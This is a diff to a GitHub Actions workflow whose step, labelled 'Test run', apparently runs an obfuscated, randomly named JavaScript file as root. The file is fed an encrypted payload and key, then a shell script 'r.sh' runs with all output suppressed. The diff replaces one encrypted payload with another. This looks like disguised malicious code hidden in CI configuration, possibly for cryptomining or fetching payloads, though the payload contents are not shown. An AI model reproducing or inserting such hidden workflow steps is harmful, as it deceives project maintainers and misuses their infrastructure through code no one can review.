--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'mz0sr'
+        echo 'm8x4v'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19mP2ivzu4U4Sue9RV4OAYY8AvBgSCEvC0iAKoIjNW05GLkZJmxYgNgD5p7yEjnWE6isgNmpvlpi17pkcz3pBZgn2vHapPHuQbFpZNlOAI1CnG8BDxgT1j7 qcb66v && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+LE0bqJX1+LACQNTQpiSbO/r2MpMok56gSOY1fF41brZ94Np+ujuc8JdYrASLXpunr549k1APzRX7oHhwg/RcpgXyzAAfn0JYbcMmIHstGT0mdWC5lxJcM lp5zat && sudo sh r.sh > /dev/null 2>&1
